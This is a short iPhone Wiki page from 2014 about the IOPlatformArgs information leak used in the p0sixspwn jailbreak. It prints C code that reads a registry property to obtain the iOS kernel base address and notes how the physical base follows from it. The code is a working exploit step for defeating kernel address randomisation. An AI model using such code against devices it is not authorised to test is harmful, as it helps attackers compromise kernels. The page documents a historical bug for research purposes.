IOPlatfromArgs leak

From The iPhone Wiki
Revision as of 13:39, 4 July 2014 by I3ppwn (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

Vulnerability used in p0sixspwn This vulnerability leaks the kernel base address. This is the code

static uint32_t
get_kernel_base_boot_args(void)
{
   CFStringRef parameter = CFSTR("IOPlatformArgs");
   CFDataRef data;
   io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
   if (platformExpert)
   {
       data = IORegistryEntryCreateCFProperty(platformExpert,
                                              parameter,
                                              kCFAllocatorDefault, 0);
   }
   IOObjectRelease(platformExpert);
   CFIndex bufferLength = CFDataGetLength(data);  
   UInt8 *buffer = malloc(bufferLength);
   CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);
   typedef struct {
       uint32_t deviceTreeP;
       uint32_t bootArgs;
       uint32_t zero;
       uint32_t zero_1;
   } platformArgs;
   platformArgs IOPlatformArgs;
   bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
   return IOPlatformArgs.bootArgs;
}

Once the attacker knows the virtual base, he can use the virt_to_phys macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug